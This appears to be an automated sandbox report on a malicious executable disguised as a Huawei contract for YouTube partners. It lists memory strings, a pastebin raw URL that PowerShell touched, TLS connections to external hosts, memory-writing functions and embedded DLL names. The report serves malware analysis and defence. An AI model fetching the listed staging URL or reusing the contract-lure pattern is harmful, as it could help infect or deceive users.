YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB31F000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA5E6000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/winforms
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000004.00000002.2198121281.0000022400C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2446866312.0000020D2068A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2198121281.0000022400C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.2275873193.0000022474176000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2273290349.0000022473EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3453EB7D NtWriteVirtualMemory,4_2_00007FFD3453EB7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345620682_2_00007FFD34562068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3456B9AC2_2_00007FFD3456B9AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346330E92_2_00007FFD346330E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345320704_2_00007FFD34532070
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34536DD94_2_00007FFD34536DD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34535E514_2_00007FFD34535E51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3453C6D54_2_00007FFD3453C6D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34534B4D4_2_00007FFD34534B4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3453DB0D4_2_00007FFD3453DB0D
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Windows.Core.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248252782.000002B7E8F30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246966709.000002B7E60C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249428276.000002B7E9571000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Windows.Core.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245130490.0000027751252000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWorkMoter.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248496144.000002B7E8FF0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWorkMoter.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245483719.00000277512C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245415853.00000277512B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244705711.000002774F921000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3254587171.000002B7EE401000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250920794.000002B7E9E81000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251066988.000002B7E9F90000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249726194.000002B7E9631000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs [Huawei] Contract for YouTube partners.exe
